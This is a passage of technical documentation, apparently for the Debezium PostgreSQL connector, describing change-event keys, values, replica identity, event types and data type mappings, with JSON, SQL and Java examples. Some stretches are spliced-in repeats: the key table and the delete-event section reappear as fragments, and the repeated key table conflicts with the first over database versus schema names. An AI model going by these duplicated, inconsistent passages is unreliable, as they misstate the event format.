`payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the {link-prefix}:{link-postgresql-connector}#postgresql-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. 
It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\n\nThe default behavior is that the connector streams change event records to {link-prefix}:{link-postgresql-connector}#postgresql-topic-names[topics with names that are the same as the event's originating table].\n\n[NOTE]\n====\nStarting with Kafka 0.10, Kafka can optionally record the event key and value with the {link-kafka-docs}.html#upgrade_10_performance_impact[_timestamp_] at which the message was created (recorded by the producer) or written to the log by Kafka.\n====\n\n[WARNING]\n====\nThe PostgreSQL connector ensures that all Kafka Connect schema names adhere to the http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the schema and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a schema name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:about-keys-in-debezium-postgresql-change-events[]\n* xref:about-values-in-debezium-postgresql-change-events[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-postgresql-change-events\n\/\/ Title: About keys in {prodname} PostgreSQL change events\n[[postgresql-change-events-key]]\n=== Change event keys\n\nFor a given table, the change event's key has a structure that contains a field for each column in the primary key of the table at the time the event was created. Alternatively, if the table has `REPLICA IDENTITY` set to `FULL` or `USING INDEX` there is a field for each unique key constraint.\n\nConsider a `customers` table defined in the `public` database schema and the example of a change event key for that table.\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id SERIAL,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL,\n PRIMARY KEY(id)\n);\n----\n\n.Example change event key\nIf the `database.server.name` connector configuration property has the value `PostgreSQL_server`, every change event for the `customers` table while it has this definition has the same key structure, which in JSON looks like this:\n\n[source,json,indent=0]\n----\n {\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"name\": \"PostgreSQL_server.public.customers.Key\", \/\/ <2>\n \"optional\": false, \/\/ <3>\n \"fields\": [ \/\/ <4>\n {\n \"name\": \"id\",\n \"index\": \"0\",\n \"schema\": {\n \"type\": \"INT32\",\n \"optional\": \"false\"\n }\n }\n ]\n },\n \"payload\": { \/\/ <5>\n \"id\": \"1\"\n },\n }\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`PostgreSQL_server.inventory.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._table-name_.`Key`. In this example: +\n\n* `PostgreSQL_server` is the name of the connector that generated this event. +\n* `inventory` is the database that contains the table that was changed. +\n* `customers` is the table that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, index, and schema.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key contains a single `id` field whose value is `1`.\n\n|===\n\n[NOTE]\n====\nAlthough the `column.exclude.list` and `column.include.list` connector configuration properties allow you to capture only a subset of table columns, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary or unique key, then the change event's key is null. The rows in a table without a primary or unique key constraint cannot be uniquely identified.\n====
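\n\nAs a usage illustration (this is not part of the connector; the broker address, group id, and the use of the JSON converter with `StringDeserializer` are assumptions), the following minimal sketch reads the key\/value pairs of such change events from the topic used in the example above:\n\n[source,java]\n----\nimport java.time.Duration;\nimport java.util.List;\nimport java.util.Properties;\nimport org.apache.kafka.clients.consumer.ConsumerRecord;\nimport org.apache.kafka.clients.consumer.KafkaConsumer;\nimport org.apache.kafka.common.serialization.StringDeserializer;\n\npublic class ChangeEventKeyReader {\n public static void main(String[] args) {\n Properties props = new Properties();\n props.put(\"bootstrap.servers\", \"localhost:9092\");\n props.put(\"group.id\", \"customers-reader\");\n props.put(\"key.deserializer\", StringDeserializer.class.getName());\n props.put(\"value.deserializer\", StringDeserializer.class.getName());\n\n try (KafkaConsumer<String, String> consumer = new KafkaConsumer<>(props)) {\n consumer.subscribe(List.of(\"PostgreSQL_server.public.customers\"));\n for (ConsumerRecord<String, String> record : consumer.poll(Duration.ofSeconds(5))) {\n \/\/ record.key() holds the JSON key shown above, e.g. a payload with \"id\": \"1\"\n System.out.println(record.key() + \" -> \" + record.value());\n }\n }\n }\n}\n----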
This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._schema-name_._table-name_.`Key`. In this example: +\n\n* `PostgreSQL_server` is the name of the connector that generated this event. +\n* `public` is the schema that contains the table that was changed. +\n* `customers` is the table that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, index, and schema.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key contains a single `id` field whose value is `1`.\n\n|===\n\n[NOTE]\n====\nAlthough the `column.exclude.list` and `column.include.list` connector configuration properties allow you to capture only a subset of table columns, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary or unique key, then the change event's key is null. The rows in a table without a primary or unique key constraint cannot be uniquely identified.\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-postgresql-change-events\n\/\/ Title: About values in {prodname} PostgreSQL change events\n[[postgresql-change-events-value]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update, or delete data all have a value payload with an envelope structure.\n\nConsider the same sample table that was used to show an example of a change event key:\n\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n id SERIAL,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL,\n PRIMARY KEY(id)\n);\n----\n\nThe value portion of a change event for a change to this table varies according to the `REPLICA IDENTITY` setting and the operation that the event is for.\n\nifdef::product[]\nDetails follow in these sections:\n\n* <<postgresql-replica-identity, Replica identity>>\n* <<postgresql-create-events,_create_ events>>\n* <<postgresql-update-events,_update_ events>>\n* <<postgresql-primary-key-updates, Primary key updates>>\n* <<postgresql-delete-events,_delete_ events>>\n* <<postgresql-tombstone-events, Tombstone events>>\nendif::product[]\n\n\/\/ Type: continue\n[[postgresql-replica-identity]]\n=== Replica identity\n\nlink:https:\/\/www.postgresql.org\/docs\/current\/static\/sql-altertable.html#SQL-CREATETABLE-REPLICA-IDENTITY[REPLICA IDENTITY] is a PostgreSQL-specific table-level setting that determines the amount of information that is available to the logical decoding plug-in for `UPDATE` and `DELETE` events. More specifically, the setting of `REPLICA IDENTITY` controls what (if any) information is available for the previous values of the table columns involved, whenever an `UPDATE` or `DELETE` event occurs.\n\nThere are four possible values for `REPLICA IDENTITY` (an example of checking and changing the setting follows this list):\n\n* `DEFAULT` - The default behavior is that `UPDATE` and `DELETE` events contain the previous values for the primary key columns of a table if that table has a primary key. For an `UPDATE` event, only the primary key columns with changed values are present.\n+\nIf a table does not have a primary key, the connector does not emit `UPDATE` or `DELETE` events for that table. For a table without a primary key, the connector emits only _create_ events. Typically, a table without a primary key is used for appending messages to the end of the table, which means that `UPDATE` and `DELETE` events are not useful.\n* `NOTHING` - Emitted events for `UPDATE` and `DELETE` operations do not contain any information about the previous value of any table column.\n* `FULL` - Emitted events for `UPDATE` and `DELETE` operations contain the previous values of all columns in the table.\n* `INDEX` _index-name_ - Emitted events for `UPDATE` and `DELETE` operations contain the previous values of the columns contained in the specified index. `UPDATE` events also contain the indexed columns with the updated values.
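\n\nFor example, a minimal sketch of inspecting and changing the setting for the sample `customers` table used throughout this section (adjust the table name for your own tables):\n\n[source,sql,indent=0]\n----\n-- Check the current replica identity:\n-- 'd' = DEFAULT, 'n' = NOTHING, 'f' = FULL, 'i' = USING INDEX\nSELECT relreplident FROM pg_class WHERE oid = 'public.customers'::regclass;\n\n-- Include the previous values of all columns in UPDATE and DELETE events:\nALTER TABLE public.customers REPLICA IDENTITY FULL;\n----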
\n\n\/\/ Type: continue\n[[postgresql-create-events]]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:\n\n[source,json,options=\"nowrap\",indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"PostgreSQL_server.inventory.customers.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"PostgreSQL_server.inventory.customers.Value\",\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"schema\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"table\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"txId\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": 
\"lsn\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"xmin\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.postgresql.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"PostgreSQL_server.inventory.customers.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"id\": 1,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"postgresql\",\n \"name\": \"PostgreSQL_server\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": true,\n \"db\": \"postgres\",\n \"sequence\": \"[\\\"24023119\\\",\\\"24023128\\\"]\"\n \"schema\": \"public\",\n \"table\": \"customers\",\n \"txId\": 555,\n \"lsn\": 24023128,\n \"xmin\": null\n },\n \"op\": \"c\", \/\/ <9>\n \"ts_ms\": 1559033904863 \/\/ <10>\n }\n}\n----\n\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`PostgreSQL_server.inventory.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. +\n +\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\na|`io.debezium.connector.postgresql.Source` is the schema for the payload's `source` field. This schema is specific to the PostgreSQL connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`PostgreSQL_server.inventory.customers.Envelope` is the schema for the overall structure of the payload, where `PostgreSQL_server` is the connector name, `inventory` is the database, and `customers` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`before`\na|An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content. 
\n\n\/\/ Type: continue\n[[postgresql-update-events]]\n=== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table:\n\n[source,json,indent=0,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1\n },\n \"after\": { \/\/ <2>\n \"id\": 1,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"postgresql\",\n \"name\": \"PostgreSQL_server\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": false,\n \"db\": \"postgres\",\n \"schema\": \"public\",\n \"table\": \"customers\",\n \"txId\": 556,\n \"lsn\": 24023128,\n \"xmin\": null\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1465584025523 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that contains values that were in the row before the database commit. In this example, only the primary key column, `id`, is present because the table's {link-prefix}:{link-postgresql-connector}#postgresql-replica-identity[`REPLICA IDENTITY`] setting is, by default, `DEFAULT`.\n+\nFor an _update_ event to contain the previous values of all columns in the row, you would have to change the `customers` table by running `ALTER TABLE customers REPLICA IDENTITY FULL`.\n\n|2\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `first_name` value is now `Anne Marie`.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Database and table that contains the new row\n* Schema name\n* If the event was part of a snapshot (always `false` for _update_ events)\n* ID of the transaction in which the operation was performed\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===
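\n\nA statement of the kind that would produce the preceding _update_ event (a sketch based on the example data):\n\n[source,sql,indent=0]\n----\nUPDATE customers SET first_name = 'Anne Marie' WHERE id = 1;\n----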
\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-postgresql-connector}#postgresql-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row. Details are in the next section.\n====\n\n\/\/ Type: continue\n[[postgresql-primary-key-updates]]\n=== Primary key updates\n\nAn `UPDATE` operation that changes a row's primary key field(s) is known\nas a primary key change. For a primary key change, in place of sending an `UPDATE` event record, the connector sends a `DELETE` event record for the old key and a `CREATE` event record for the new (updated) key. These events have the usual structure and content, and in addition, each one has a message header related to the primary key change:\n\n* The `DELETE` event record has `__debezium.newkey` as a message header. The value of this header is the new primary key for the updated row.\n\n* The `CREATE` event record has `__debezium.oldkey` as a message header. The value of this header is the previous (old) primary key that the updated row had.\n\n\/\/ Type: continue\n[[postgresql-delete-events]]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"postgresql\",\n \"name\": \"PostgreSQL_server\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": false,\n \"db\": \"postgres\",\n \"schema\": \"public\",\n \"table\": \"customers\",\n \"txId\": 556,\n \"lsn\": 46523128,\n \"xmin\": null\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1465581902461 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit. +\n +\nIn this example, the `before` field contains only the primary key column because the table's {link-prefix}:{link-postgresql-connector}#postgresql-replica-identity[`REPLICA IDENTITY`] setting is `DEFAULT`.\n\n|2\n|`after`\n|Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and `lsn` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Database and table that contained the deleted row\n* Schema name\n* If the event was part of a snapshot (always `false` for _delete_ events)\n* ID of the transaction in which the operation was performed\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===
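\n\nAnd a statement of the kind that would produce the preceding _delete_ event (again, a sketch based on the example row):\n\n[source,sql,indent=0]\n----\nDELETE FROM customers WHERE id = 1;\n----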
},\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"postgresql\",\n \"name\": \"PostgreSQL_server\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": false,\n \"db\": \"postgres\",\n \"schema\": \"public\",\n \"table\": \"customers\",\n \"txId\": 556,\n \"lsn\": 46523128,\n \"xmin\": null\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1465581902461 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit. +\n +\nIn this example, the `before` field contains only the primary key column because the table's {link-prefix}:{link-postgresql-connector}#postgresql-replica-identity[`REPLICA IDENTITY`] setting is `DEFAULT`.\n\n|2\n|`after`\n|Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and `lsn` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata:\n\n* {prodname} version\n* Connector type and name\n* Database and table that contained the deleted row\n* Schema name\n* If the event was part of a snapshot (alwas `false` for _delete_ events)\n* ID of the transaction in which the operation was performed\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row.\n\n[WARNING]\n====\nFor a consumer to be able to process a _delete_ event generated for a table that does not have a primary key, set the table's `REPLICA IDENTITY` to `FULL`. When a table does not have a primary key and the table's `REPLICA IDENTITY` is set to `DEFAULT` or `NOTHING`, a _delete_ event has no `before` field.\n====\n\nPostgreSQL connector events are designed to work with link:{link-kafka-docs}#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. 
This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n\/\/ Type: continue\n[[postgresql-tombstone-events]]\n.Tombstone events\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, the PostgreSQL connector follows a _delete_ event with a special _tombstone_ event that has the same key but a `null` value.\n\n\/\/ Type: continue\n[[postgresql-truncate-events]]\n=== _truncate_ events\n\nA _truncate_ change event signals that a table has been truncated.\nIn this case, the message key is `null` and the message value looks like this:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"source\": { \/\/ <1>\n \"version\": \"{debezium-version}\",\n \"connector\": \"postgresql\",\n \"name\": \"PostgreSQL_server\",\n \"ts_ms\": 1559033904863,\n \"snapshot\": false,\n \"db\": \"postgres\",\n \"schema\": \"public\",\n \"table\": \"customers\",\n \"txId\": 556,\n \"lsn\": 46523128,\n \"xmin\": null\n },\n \"op\": \"t\", \/\/ <2>\n \"ts_ms\": 1559033904961 \/\/ <3>\n }\n}\n----\n\n.Descriptions of _truncate_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _truncate_ event value, the `source` field structure is the same as for _create_, _update_, and _delete_ events for the same table, and provides this metadata:\n\n* {prodname} version\n* Connector type and name\n* Database and table that was truncated\n* Schema name\n* If the event was part of a snapshot (always `false` for _truncate_ events)\n* ID of the transaction in which the operation was performed\n* Offset of the operation in the database log\n* Timestamp for when the change was made in the database\n\n|2\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `t`, signifying that this table was truncated.\n\n|3\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task. +\n +\nIn the `source` object, `ts_ms` indicates the time that the change was made in the database. By comparing the value for `payload.source.ts_ms` with the value for `payload.ts_ms`, you can determine the lag between the source database update and {prodname}.\n\n|===\n\nWhen a single `TRUNCATE` statement applies to multiple tables,\nthe connector emits one _truncate_ change event record for each truncated table.\n\nNote that because _truncate_ events represent a change made to an entire table and do not have a message key,\nunless you are working with topics that have a single partition,\nthere are no ordering guarantees between the change events pertaining to a table (_create_, _update_, etc.) 
and _truncate_ events for that table.\nFor instance, a consumer may receive an _update_ event only after a _truncate_ event for that table,\nwhen those events are read from different partitions.\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-postgresql-connectors-map-data-types\n\/\/ Title: How {prodname} PostgreSQL connectors map data types\n[[postgresql-data-types]]\n== Data type mappings\n\nThe PostgreSQL connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. How that value is represented in the event depends on the PostgreSQL data type of the column. The following sections describe how the connector maps PostgreSQL data types to a _literal type_ and a _semantic type_ in event fields.\n\n* _literal type_ describes how the value is literally represented using Kafka Connect schema types: `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`.\n\n* _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:postgresql-basic-types[]\n* xref:postgresql-temporal-types[]\n* xref:postgresql-timestamp-type[]\n* xref:postgresql-decimal-types[]\n* xref:postgresql-hstore-type[]\n* xref:postgresql-domain-types[]\n* xref:postgresql-network-address-types[]\n* xref:postgresql-postgis-types[]\n* xref:postgresql-toasted-values[]\n\nendif::product[]\n\n[id=\"postgresql-basic-types\"]\n=== Basic types\n\nThe following table describes how the connector maps basic types.\n\n.Mappings for PostgreSQL basic data types\n[cols=\"25%a,20%a,55%a\",options=\"header\"]\n|===\n|PostgreSQL data type\n|Literal type (schema type)\n|Semantic type (schema name) and Notes\n\n|`BOOLEAN`\n|`BOOLEAN`\n|n\/a\n\n|`BIT(1)`\n|`BOOLEAN`\n|n\/a\n\n|`BIT( > 1)`\n|`BYTES`\n|`io.debezium.data.Bits` +\n +\nThe `length` schema parameter contains an integer that represents the number of bits. The resulting `byte[]` contains the bits in little-endian form and is sized to contain the specified number of bits. For example, `numBytes = n\/8 + (n % 8 == 0 ? 0 : 1)` where `n` is the number of bits.\n\n|`BIT VARYING[(M)]`\n|`BYTES`\n|`io.debezium.data.Bits` +\n +\nThe `length` schema parameter contains an integer that represents the number of bits (2^31 - 1 in case no length is given for the column). The resulting `byte[]` contains the bits in little-endian form and is sized based on the content. 
The specified size `(M)` is stored in the length parameter of the `io.debezium.data.Bits` type.\n\n|`SMALLINT`, `SMALLSERIAL`\n|`INT16`\n|n\/a\n\n|`INTEGER`, `SERIAL`\n|`INT32`\n|n\/a\n\n|`BIGINT`, `BIGSERIAL`, `OID`\n|`INT64`\n|n\/a\n\n|`REAL`\n|`FLOAT32`\n|n\/a\n\n|`DOUBLE PRECISION`\n|`FLOAT64`\n|n\/a\n\n|`CHAR[(M)]`\n|`STRING`\n|n\/a\n\n|`VARCHAR[(M)]`\n|`STRING`\n|n\/a\n\n|`CHARACTER[(M)]`\n|`STRING`\n|n\/a\n\n|`CHARACTER VARYING[(M)]`\n|`STRING`\n|n\/a\n\n|`TIMESTAMPTZ`, `TIMESTAMP WITH TIME ZONE`\n|`STRING`\n|`io.debezium.time.ZonedTimestamp` +\n +\nA string representation of a timestamp with timezone information, where the timezone is GMT.\n\n|`TIMETZ`, `TIME WITH TIME ZONE`\n|`STRING`\n|`io.debezium.time.ZonedTime` +\n +\nA string representation of a time value with timezone information, where the timezone is GMT.\n\n|`INTERVAL [P]`\n|`INT64`\n|`io.debezium.time.MicroDuration` +\n(default) +\n +\nThe approximate number of microseconds for a time interval using the `365.25 \/ 12.0` formula for days per month average.\n\n|`INTERVAL [P]`\n|`STRING`\n|`io.debezium.time.Interval` +\n(when `interval.handling.mode` is set to `string`) +\n +\nThe string representation of the interval value that follows the pattern `P<years>Y<months>M<days>DT<hours>H<minutes>M<seconds>S`, for example, `P1Y2M3DT4H5M6.78S`.\n\n|`BYTEA`\n|`BYTES` or `STRING`\n|n\/a +\n +\nEither the raw bytes (the default), a base64-encoded string, or a hex-encoded string, based on the connector's {link-prefix}:{link-postgresql-connector}#postgresql-property-binary-handling-mode[binary handling mode] setting.\n\n|`JSON`, `JSONB`\n|`STRING`\n|`io.debezium.data.Json` +\n +\nContains the string representation of a JSON document, array, or scalar.\n\n|`XML`\n|`STRING`\n|`io.debezium.data.Xml` +\n +\nContains the string representation of an XML document.\n\n|`UUID`\n|`STRING`\n|`io.debezium.data.Uuid` +\n +\nContains the string representation of a PostgreSQL UUID value.\n\n|`POINT`\n|`STRUCT`\n|`io.debezium.data.geometry.Point` +\n +\nContains a structure with two `FLOAT64` fields, `(x,y)`. Each field represents the coordinates of a geometric 